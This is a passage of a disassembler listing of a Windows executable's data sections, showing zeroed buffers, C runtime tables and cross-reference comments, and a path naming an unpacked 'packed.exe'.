; sub_40B690+479�r
dword_4D43AC dd 0 ; DATA XREF: sub_40B690+41B�w
dword_4D43B0 dd 0 ; DATA XREF: sub_40B690+42D�w
dword_4D43B4 dd 0 ; DATA XREF: sub_40B690+3FB�w
dd 0
dword_4D43BC dd 0 ; DATA XREF: sub_40B690:loc_40BB68�r
dword_4D43C0 dd 0 ; DATA XREF: sub_40B690+2B7�w
; sub_40B690+34D�o
dword_4D43C4 dd 0 ; DATA XREF: sub_40B690+343�w
; sub_40B690+35F�r
dword_4D43C8 dd 0 ; DATA XREF: sub_40B690+2C2�w
dword_4D43CC dd 0 ; DATA XREF: sub_40B690+2AC�w
; sub_40B690+31A�r
; char byte_4D43D0[]
byte_4D43D0 db 80h dup(0) ; DATA XREF: sub_40B690+2D5�o
; sub_40B690+307�o
dword_4D4450 dd 0 ; DATA XREF: sub_40B690+2C8�w
dword_4D4454 dd 0 ; DATA XREF: sub_40B690+2DF�w
; sub_40B690+311�w
dword_4D4458 dd 0 ; DATA XREF: sub_40B690:loc_40BB53�r
align 10h
dword_4D4460 dd 0 ; DATA XREF: sub_40B690+194�w
; sub_40B690+226�o
dword_4D4464 dd 41h dup(0) ; DATA XREF: sub_40B690+15D�o
; char byte_4D4568[]
byte_4D4568 db 104h dup(0) ; DATA XREF: sub_40B690+17B�o
dword_4D466C dd 0 ; DATA XREF: sub_40B690+21C�w
; sub_40B690+238�r
dword_4D4670 dd 0 ; DATA XREF: sub_40B690+169�w
dword_4D4674 dd 0 ; DATA XREF: sub_40B690+164�w
; sub_40B690+1F3�r
; char byte_4D4678[]
byte_4D4678 db 80h dup(0) ; DATA XREF: sub_40B690+1AD�o
; sub_40B690+1DF�o
dword_4D46F8 dd 0 ; DATA XREF: sub_40B690+1A0�w
dword_4D46FC dd 0 ; DATA XREF: sub_40B690+1B7�w
; sub_40B690+1E9�w
dword_4D4700 dd 0 ; DATA XREF: sub_40B690:loc_40B983�r
align 8
dword_4D4708 dd 0 ; DATA XREF: sub_40B690+82�w
; sub_40B690+FE�o
dword_4D470C dd 41h dup(0) ; DATA XREF: sub_40B690+46�o
; char byte_4D4810[]
byte_4D4810 db 104h dup(0) ; DATA XREF: sub_40B690+69�o
dword_4D4914 dd 0 ; DATA XREF: sub_40B690+F4�w
; sub_40B690+110�r
dword_4D4918 dd 0 ; DATA XREF: sub_40B690+52�w
dword_4D491C dd 0 ; DATA XREF: sub_40B690+4D�w
; sub_40B690+CB�r
; char byte_4D4920[]
byte_4D4920 db 80h dup(0) ; DATA XREF: sub_40B690+9A�o
; sub_40B690+B7�o
dword_4D49A0 dd 0 ; DATA XREF: sub_40B690+8D�w
dword_4D49A4 dd 0 ; DATA XREF: sub_40B690+A4�w
; sub_40B690+C1�w
dword_4D49A8 dd 0 ; DATA XREF: sub_40B690:loc_40B85B�r
align 10h
; char byte_4D49B0[]
byte_4D49B0 db 200h dup(0) ; DATA XREF: sub_40C30A+91�o
dword_4D4BB0 dd 40h dup(0) ; DATA XREF: sub_40D055+C0�o
; .text:0040D2AF�o
dword_4D4CB0 dd 0 ; DATA XREF: .text:0040D2C7�w
dword_4D4CB4 dd 0 ; DATA XREF: .text:0040D688�w
; .text:0040D6A1�r ...
dword_4D4CB8 dd 0 ; DATA XREF: .text:0040D29E�w
; .text:0040D695�w ...
dword_4D4CBC dd 0 ; DATA XREF: .text:0040D18F�w
; .text:0040D290�r ...
dword_4D4CC0 dd 0 ; DATA XREF: .text:0040D174�w
; .text:loc_40D1B6�r
align 8
dword_4D4CC8 dd 2Bh dup(0) ; DATA XREF: .text:0040D236�o
dword_4D4D74 dd 81h dup(0) ; DATA XREF: .text:0040D258�o
db 2 dup(0)
word_4D4F7A dw 0 ; DATA XREF: .text:0040D56D�o
; .text:0040D59A�o ...
dword_4D4F7C dd 0 ; DATA XREF: .text:loc_40D630�o
db 2 dup(0)
word_4D4F82 dw 0 ; DATA XREF: .text:0040D2F2�o
; .text:0040D324�o ...
dword_4D4F84 dd 4 dup(0) ; DATA XREF: .text:loc_40D303�o
dword_4D4F94 dd 2Eh dup(0) ; DATA XREF: .text:0040D269�o
db 2 dup(0)
word_4D504E dw 0 ; DATA XREF: .text:0040D27D�o
dd 1Eh dup(0)
dword_4D50C8 dd 0 ; DATA XREF: .text:0040D721�w
; .text:0040D74B�r
dword_4D50CC dd 3 dup(0) ; DATA XREF: sub_40ED91+66�o
; char byte_4D50D8[]
byte_4D50D8 db 100h dup(0) ; DATA XREF: sub_40F87A+1E�o
; wchar_t *dword_4D51D8
dword_4D51D8 dd 0 ; DATA XREF: sub_40F87A+71�r
; sub_40F87A+85�r
align 10h
dword_4D51E0 dd 19h dup(0) ; DATA XREF: sub_40F87A+93�o
dword_4D5244 dd 0 ; DATA XREF: sub_411555+9A�o
; sub_411555+CF�r ...
dword_4D5248 dd 0 ; DATA XREF: sub_4114C7+35�r
; sub_411555+95�o ...
dword_4D524C dd 0 ; DATA XREF: sub_41150A+1F�r
; sub_411555+BC�o ...
dword_4D5250 dd 0 ; DATA XREF: sub_4114C7+17�r
; sub_41150A+3D�r ...
dword_4D5254 dd 0 ; DATA XREF: sub_411555+B7�o
; sub_411555+DB�r ...
dword_4D5258 dd 0 ; DATA XREF: sub_40B4FF+15�r
; sub_411722+2BA�w
dword_4D525C dd 0B5DFh ; DATA XREF: sub_40B690+2A7�r
; .text:0040CF7A�r ...
dword_4D5260 dd 0 ; DATA XREF: sub_411A00+2A�w
; sub_411A00+51�r ...
align 8
dword_4D5268 dd 0 ; DATA XREF: sub_413848+152�r
align 10h
dword_4D5270 dd 0 ; DATA XREF: sub_41549E+1CE�w
; sub_41549E+1F5�w
align 8
byte_4D5278 db 0 ; DATA XREF: sub_415C89+10F�w
; sub_415C89+20E�o
align 2
word_4D527A dw 0 ; DATA XREF: sub_415C89+11F�w
word_4D527C dw 0 ; DATA XREF: sub_415C89+125�w
word_4D527E dw 0 ; DATA XREF: sub_415C89+12C�w
byte_4D5280 db 0 ; DATA XREF: sub_415C89+133�w
byte_4D5281 db 0 ; DATA XREF: sub_415C89+13A�w
word_4D5282 dw 0 ; DATA XREF: sub_415C89+140�w
dword_4D5284 dd 0 ; DATA XREF: sub_415C89+16E�w
; sub_415C89+18C�w
dword_4D5288 dd 0 ; DATA XREF: sub_415C89+194�w
byte_4D528C db 0 ; DATA XREF: sub_415C89+1A6�w
byte_4D528D db 0 ; DATA XREF: sub_415C89+1B9�w
word_4D528E dw 0 ; DATA XREF: sub_415C89+1D1�w
word_4D5290 dw 0 ; DATA XREF: sub_415C89+1E0�w
word_4D5292 dw 0 ; DATA XREF: sub_415C89+1D8�w
dword_4D5294 dd 101h dup(0) ; DATA XREF: sub_415C89+1F5�o
; char byte_4D5698[]
byte_4D5698 db 200h dup(0) ; DATA XREF: sub_40274D+2D39�o
; sub_40274D:loc_405535�o ...
dword_4D5898 dd 0 ; DATA XREF: sub_40274D+1843�w
; sub_40274D+2D31�r ...
align 10h
byte_4D58A0 db 0 ; DATA XREF: sub_417272+1C8�w
; sub_417272+2A1�o
align 2
word_4D58A2 dw 0 ; DATA XREF: sub_417272+1D5�w
word_4D58A4 dw 0 ; DATA XREF: sub_417272+1DF�w
word_4D58A6 dw 0 ; DATA XREF: sub_417272+1E8�w
byte_4D58A8 db 0 ; DATA XREF: sub_417272+1EF�w
byte_4D58A9 db 0 ; DATA XREF: sub_417272+1F6�w
word_4D58AA dw 0 ; DATA XREF: sub_417272+1FD�w
dword_4D58AC dd 0 ; DATA XREF: sub_417272+20A�w
dword_4D58B0 dd 0 ; DATA XREF: sub_417272+212�w
word_4D58B4 dw 0 ; DATA XREF: sub_417272+26B�w
word_4D58B6 dw 0 ; DATA XREF: sub_417272+253�w
word_4D58B8 dw 0 ; DATA XREF: sub_417272+27D�w
word_4D58BA dw 0 ; DATA XREF: sub_417272+21E�w
dword_4D58BC dd 100h dup(0) ; DATA XREF: sub_417272+28C�o
dword_4D5CBC dd 0 ; DATA XREF: sub_41776E+372�w
; sub_41776E+3E8�o
dword_4D5CC0 dd 0 ; DATA XREF: sub_41776E+30E�w
byte_4D5CC4 db 0 ; DATA XREF: sub_41776E+314�w
byte_4D5CC5 db 0 ; DATA XREF: sub_41776E+31A�w
word_4D5CC6 dw 0 ; DATA XREF: sub_41776E+327�w
dword_4D5CC8 dd 6 dup(0) ; DATA XREF: sub_41776E+3CC�o
byte_4D5CE0 db 0 ; DATA XREF: sub_41776E+223�o
; sub_41776E+238�w ...
byte_4D5CE1 db 0 ; DATA XREF: sub_41776E+246�w
word_4D5CE2 dw 0 ; DATA XREF: sub_41776E+270�w
word_4D5CE4 dw 0 ; DATA XREF: sub_41776E+25E�w
; sub_41776E:loc_417B11�w
word_4D5CE6 dw 0 ; DATA XREF: sub_41776E+276�w
byte_4D5CE8 db 0 ; DATA XREF: sub_41776E+27D�w
byte_4D5CE9 db 0 ; DATA XREF: sub_41776E+23F�w
word_4D5CEA dw 0 ; DATA XREF: sub_41776E+3B9�w
; sub_41776E+3ED�w
dword_4D5CEC dd 0 ; DATA XREF: sub_41776E:loc_417A0A�w
; sub_41776E+36D�r
dword_4D5CF0 dd 0 ; DATA XREF: sub_41776E+2A9�w
word_4D5CF4 dw 0 ; DATA XREF: sub_41776E+367�w
; sub_41776E+3C7�o
word_4D5CF6 dw 0 ; DATA XREF: sub_41776E+308�w
; sub_41776E+32D�r ...
dword_4D5CF8 dd 0 ; DATA XREF: sub_41776E+2E2�w
; sub_41776E+3AA�w
dword_4D5CFC dd 0 ; DATA XREF: sub_41776E+2FB�w
; sub_41776E+37E�w ...
byte_4D5D00 db 0 ; DATA XREF: sub_41776E+2E7�r
; sub_41776E+2F0�w
byte_4D5D01 db 0 ; DATA XREF: sub_41776E+2AE�w
; sub_41776E+377�w ...
word_4D5D02 dw 0 ; DATA XREF: sub_41776E+2BC�w
word_4D5D04 dw 0 ; DATA XREF: sub_41776E+3C0�w
; sub_41776E+40C�w
word_4D5D06 dw 0 ; DATA XREF: sub_41776E+301�w
dd 0
word_4D5D0C dw 0 ; DATA XREF: sub_41776E+333�w
; sub_41776E+3FD�o
word_4D5D0E dw 0 ; DATA XREF: sub_41776E+342�w
; sub_41776E+3DB�w
dword_4D5D10 dd 0 ; DATA XREF: sub_41776E+33C�w
align 10h
dword_4D5D20 dd 0 ; DATA XREF: sub_41776E+32�w
; sub_41776E+406�r
align 8
; char byte_4D5D28[]
byte_4D5D28 db 400h dup(0) ; DATA XREF: sub_41776E+1AC�o
; sub_41776E+44F�o
; char byte_4D6128[]
byte_4D6128 db 4000h dup(0) ; DATA XREF: sub_417D70+1D�o
; sub_417E10�o ...
; char dword_4DA128[]
dword_4DA128 dd 0 ; DATA XREF: sub_417D70+13�o
; sub_417E10+E�o ...
dword_4DA12C dd 0Dh dup(0) ; DATA XREF: sub_419443+10�o
; wchar_t word_4DA160
word_4DA160 dw 0 ; DATA XREF: sub_419B8C+D5�o
; sub_419D2A+97�o ...
align 4
dd 1FFh dup(0)
dword_4DA960 dd 0 ; DATA XREF: sub_419A03+35�r
; sub_419A03+65�r ...
dword_4DA964 dd 0 ; DATA XREF: sub_419E4F+55�r
; sub_419EE6+64�r ...
; wchar_t word_4DA968
word_4DA968 dw 0 ; DATA XREF: sub_419B8C+EC�o
; sub_419D2A+AE�o ...
align 4
dd 1FFh dup(0)
dword_4DB168 dd 0 ; DATA XREF: sub_419A03+94�r
; sub_419FFD+85�w
dword_4DB16C dd 0 ; DATA XREF: sub_419A03+A2�r
; sub_419FFD+92�w
dword_4DB170 dd 0 ; DATA XREF: sub_419A03+D6�r
; sub_419A03+173�r ...
dword_4DB174 dd 0 ; DATA XREF: sub_419E4F+5�r
; sub_419E4F+2E�r ...
dword_4DB178 dd 0 ; DATA XREF: sub_419B8C+172�w
; sub_419D2A+FF�w
; void *Src
Src dd 0 ; DATA XREF: sub_419B8C+177�w
; sub_419D2A+105�w ...
dword_4DB180 dd 0 ; DATA XREF: sub_419B8C+150�w
; sub_419E4F+4F�r
align 8
; char byte_4DB188[]
byte_4DB188 db 200h dup(0) ; DATA XREF: sub_419E4F+5E�o
; char byte_4DB388[]
byte_4DB388 db 200h dup(0) ; DATA XREF: sub_419EE6+3F�o
dword_4DB588 dd 0 ; DATA XREF: sub_41A7A3+29�w
; sub_41A7A3:loc_41A934�w ...
dword_4DB58C dd 0 ; DATA XREF: sub_40274D+39DD�o
; sub_41A24C+13�o ...
dd 0
dword_4DB594 dd 0 ; DATA XREF: sub_41A7A3+21�r
; sub_41A954+3A�r
dd 7Fh dup(0)
dword_4DB794 dd 0 ; DATA XREF: sub_41A7A3+19�r
; sub_41A954+4B�w
dd 1944h dup(0)
; char byte_4E1CA8[]
byte_4E1CA8 db 4 dup(0) ; DATA XREF: sub_41A954+23�o
; sub_41ACD0+6D�o
dword_4E1CAC dd 7Fh dup(0) ; DATA XREF: sub_40274D+39FB�o
; sub_41A24C+3C�o
; char byte_4E1EA8[]
byte_4E1EA8 db 5Ch dup(0) ; DATA XREF: sub_41B507:loc_41B620�o
; sub_41B507+12D�o ...
dword_4E1F04 dd 0 ; DATA XREF: sub_41B802+53�w
; sub_41B802+5B�r ...
dword_4E1F08 dd 0 ; DATA XREF: sub_41B802+33�r
; sub_41B802+3E�w ...
align 10h
; char byte_4E1F10[]
byte_4E1F10 db 60h dup(0) ; DATA XREF: sub_41BD5A:loc_41BE78�o
; sub_41BD5A+12A�o
; char byte_4E1F70[]
byte_4E1F70 db 200h dup(0) ; DATA XREF: sub_41BE8A+81�o
; sub_41BE8A+A9�o
; char byte_4E2170[]
byte_4E2170 db 200h dup(0) ; DATA XREF: sub_41BF46:loc_41BF7E�o
; sub_41BF46+60�o
; char byte_4E2370[]
byte_4E2370 db 200h dup(0) ; DATA XREF: sub_41BFBE+51�o
; sub_41BFBE+83�o ...
; char byte_4E2570[]
byte_4E2570 db 200h dup(0) ; DATA XREF: sub_41C19B+68�o
; sub_41C19B+8E�o ...
dword_4E2770 dd 0 ; DATA XREF: sub_41C7BD+1A�r
; sub_41C9D4+87�o
; int dword_4E2774
dword_4E2774 dd 0 ; DATA XREF: sub_41C87C+BA�r
; sub_41C87C+101�r ...
dword_4E2778 dd 0 ; DATA XREF: sub_41C78D:loc_41C7A1�r
; sub_41C9D4+11F�w
dword_4E277C dd 0 ; DATA XREF: sub_41C78D�r
; sub_41C87C+9A�r ...
; char byte_4E2780[]
byte_4E2780 db 34h dup(0) ; DATA XREF: sub_41C87C+B5�o
; sub_41C87C+FC�o ...
dword_4E27B4 dd 0 ; DATA XREF: sub_41C78D:loc_41C7AE�r
; sub_41C87C+35�r ...
; char byte_4E27B8[]
byte_4E27B8 db 38h dup(0) ; DATA XREF: sub_41D5F8+40�o
byte_4E27F0 db 0 ; DATA XREF: .text:0041DF9C�o
; .text:0041DFC2�o ...
align 4
dd 3Fh dup(0)
dword_4E28F0 dd 0 ; DATA XREF: _strtok+43�r _strtok+9F�w
dword_4E28F4 dd 0 ; DATA XREF: __fsopen+9�w _strtoxl+165�w ...
dword_4E28F8 dd 0 ; DATA XREF: sub_42065F+35�w
; __close:loc_420F83�w ...
dword_4E28FC dd 0 ; DATA XREF: __sopen+149�r
dword_4E2900 dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_4E2904 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_4E2908 dd 501h ; DATA XREF: start+65�w
dword_4E290C dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_4E2910 dd 1 ; DATA XREF: start+3A�w
dword_4E2914 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_40A542�r
; __setargv+8F�w
dword_4E2918 dd 340B20h ; DATA XREF: WinMain(x,x,x,x)+2E8�r
; WinMain(x,x,x,x)+308�r ...
align 10h
; void *Memory
Memory dd 340B40h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_426498�r ...
align 10h
off_4E2930 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_4E2938 db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 4
dword_4E293C dd 0 ; DATA XREF: _doexit+27�w
dword_4E2940 dd 0 ; DATA XREF: _doexit+7�r _doexit+B0�w
dword_4E2944 dd 0 ; DATA XREF: __openfile+14C�w
; __stbuf:loc_422C97�w ...
dd 0
dword_4E294C dd 0 ; DATA XREF: __fpmath+F�w
dword_4E2950 dd 0 ; DATA XREF: _CreateFrameInfo(FrameInfo *,void *)+A�r
; _CreateFrameInfo(FrameInfo *,void *)+13�w ...
; char *dword_4E2954
dword_4E2954 dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_4263F9�r ...
dd 0
dword_4E295C dd 0 ; DATA XREF: __amsg_exit�r start+D2�r ...
dword_4E2960 dd 0 ; DATA XREF: __callnewh�r
dword_4E2964 dd 0 ; DATA XREF: _realloc:loc_41E4CB�r
; _realloc:loc_41E509�r ...
align 10h
dword_4E2970 dd 1 ; DATA XREF: __setmbcp+19�w
; __setmbcp+21�w ...
dword_4E2974 dd 0 ; DATA XREF: __cftoe+12�r __cftof+1A�r ...
byte_4E2978 db 0 ; DATA XREF: __cftoe+3�r __cftoe+8D�r ...
align 4
dword_4E297C dd 0 ; DATA XREF: __cftof+11�r __cftog+1A�w ...
byte_4E2980 db 0 ; DATA XREF: __cftog+57�w
align 4
dword_4E2984 dd 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+32�r
; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+42�w ...
dword_4E2988 dd 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+3A�r
; CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+4B�w ...
dword_4E298C dd 0 ; DATA XREF: FrameUnwindFilter(_EXCEPTION_POINTERS *):loc_424CAB�w
; ___FrameUnwindToState+15�w ...
dword_4E2990 dd 0 ; DATA XREF: _CallSETranslator(EHExceptionRecord *,EHRegistrationNode *,void *,void *,_s_FuncInfo const *,int,EHRegistrationNode *)+8D�r
; FindHandlerForForeignException(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,int,int,EHRegistrationNode *)+14�r
dword_4E2994 dd 0 ; DATA XREF: sub_4254B5+C�r
; int (__stdcall *dword_4E2998)()
dword_4E2998 dd 77C26E79h ; DATA XREF: __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *):loc_425587�r
; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)+40�r ...
dd 2 dup(0)
; int dword_4E29A4
dword_4E29A4 dd 0 ; DATA XREF: _mbstowcs+20�r
; _mbstowcs:loc_4205AE�r ...
dd 3 dup(0)
; int dword_4E29B4
dword_4E29B4 dd 0 ; DATA XREF: _mbstowcs+61�r
; _mbstowcs+C3�r ...
dd 0
dword_4E29BC dd 1 ; DATA XREF: ___crtLCMapStringA+E�r
; ___crtLCMapStringA+31�w ...
dword_4E29C0 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_4E29C4 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_4E2930�o
align 4
dd 3Ah dup(0)
byte_4E2ACC db 0 ; DATA XREF: __setargv+23�w
align 10h
dword_4E2AD0 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_4E2AD4 dd 0 ; DATA XREF: __openfile+7�r
dword_4E2AD8 dd 1 ; DATA XREF: ___crtGetStringTypeA+E�r
; ___crtGetStringTypeA+2E�w ...
dword_4E2ADC dd 0 ; DATA XREF: ___security_error_handler+17�r
word_4E2AE0 dw 0 ; DATA XREF: __fltout+1F�o __fltout+4D�r
byte_4E2AE2 db 0 ; DATA XREF: __fltout+41�r
align 4
dword_4E2AE4 dd 6 dup(0) ; DATA XREF: __fltout+5C�o
dword_4E2AFC dd 0 ; DATA XREF: __fltout+48�w __fltout+66�o
dword_4E2B00 dd 0 ; DATA XREF: __fltout+54�w
dword_4E2B04 dd 0 ; DATA XREF: __fltout+3C�w
dword_4E2B08 dd 0 ; DATA XREF: __fltout+5C�w
align 10h
dword_4E2B10 dd 0 ; DATA XREF: __ValidateEH3RN:loc_42856E�r
; __ValidateEH3RN+13F�r ...
align 8
dword_4E2B18 dd 0 ; DATA XREF: __ValidateEH3RN:loc_428581�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_4E2B58 dd 0 ; DATA XREF: __ValidateEH3RN+12C�o
; __ValidateEH3RN+191�o ...
dword_4E2B5C dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_4E2B60 dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_4287D5�r
dword_4E2B64 dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_4E2B68 dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_428790�r
dword_4E2B6C dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_4E2B70 dd 0 ; DATA XREF: __sopen+3D�r
dword_4E2B74 dd 0 ; DATA XREF: _raise:loc_429315�r
; _raise+6C�o
dword_4E2B78 dd 0 ; DATA XREF: _raise:loc_4292ED�r
; _raise+44�o
dword_4E2B7C dd 0 ; DATA XREF: _raise:loc_4292E0�r
; _raise+37�o
dword_4E2B80 dd 0 ; DATA XREF: _raise:loc_4292FA�r
; _raise+51�o
align 8
dword_4E2B88 dd 0 ; DATA XREF: ___crtLCMapStringW+11�r
; ___crtLCMapStringW+31�w ...
dword_4E2B8C dd 0 ; DATA XREF: ___crtGetStringTypeW+11�r
; ___crtGetStringTypeW+2E�w ...
dword_4E2B90 dd 1 ; DATA XREF: _floor�r _ceil�r ...
dword_4E2B94 dd 1 ; DATA XREF: ___sse2_available_init+4D�w
; ___sse2_available_init+78�w
dword_4E2B98 dd 20h ; DATA XREF: __close+8�r __read+B�r ...
align 10h
dword_4E2BA0 dd 340650h ; DATA XREF: ___initstdio+7B�r
; __filbuf+74�r ...
dword_4E2BA4 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
; int dword_4E2CA0
dword_4E2CA0 dd 0 ; DATA XREF: __ismbcspace+37�r
; _setSBCS+1A�w ...
dword_4E2CA4 dd 0 ; DATA XREF: __ismbcspace+21�r
; _setSBCS+15�w ...
dd 6 dup(0)
byte_4E2CC0 db 0 ; DATA XREF: _setSBCS+6�o __setmbcp+A7�o ...
byte_4E2CC1 db 0 ; DATA XREF: __splitpath+5E�r
; _setSBUpLow+104�w ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_4E2DC4
dword_4E2DC4 dd 4E4h ; DATA XREF: __ismbcspace+40�r
; _setSBCS+10�w ...
align 10h
dword_4E2DD0 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_4E2DE0 db 0 ; DATA XREF: _setSBUpLow:loc_422E9C�w
; _setSBUpLow:loc_422EB9�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
; void *Dst
Dst dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_4E2EE4 dd 0 ; DATA XREF: ___sbh_heap_init+28�w
; ___sbh_find_block�r ...
dword_4E2EE8 dd 0 ; DATA XREF: ___sbh_heap_init+15�w
; ___sbh_find_block+8�r ...
dword_4E2EEC dd 0 ; DATA XREF: _realloc+58�r
; __heap_alloc+E�r ...
dword_4E2EF0 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_4E2EF4 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_4E2EF8 dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_4E2EFC dd 340000h ; DATA XREF: _free+2A�r _realloc+B6�r ...
dword_4E2F00 dd 1 ; DATA XREF: _free+9�r
; _realloc:loc_41E3F1�r ...
dword_4E2F04 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_42639B�r ...
dword_4E2F08 dd 341080h ; DATA XREF: ___initstdio+2B�w
; ___initstdio+44�w ...
dd 5 dup(0)
dword_4E2F20 dd 400h dup(0) ; DATA XREF: .data:off_443500�o
; .data:00443508�o
; size_t NumOfElements
NumOfElements dd 200h ; DATA XREF: ___initstdio�r
; ___initstdio:loc_41F8D1�w ...
dword_4E3F24 dd 1 ; DATA XREF: __setenvp+9F�w
dword_4E3F28 dd 34075Ch ; DATA XREF: _doexit+3E�r
; _doexit:loc_41F202�r ...
; void *dword_4E3F2C
dword_4E3F2C dd 340758h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_4E3F30 dd 1 ; DATA XREF: ___initmbctable�r
; ___initmbctable+11�w ...
_data ends
; Section 4. (virtual address 000E4000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 000E4000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4E4000h
dd 53h dup(0)
dword_4E414C dd 2Dh dup(0) ; DATA XREF: .rdata:off_439428�o
align 1000h
_idata2 ends
end start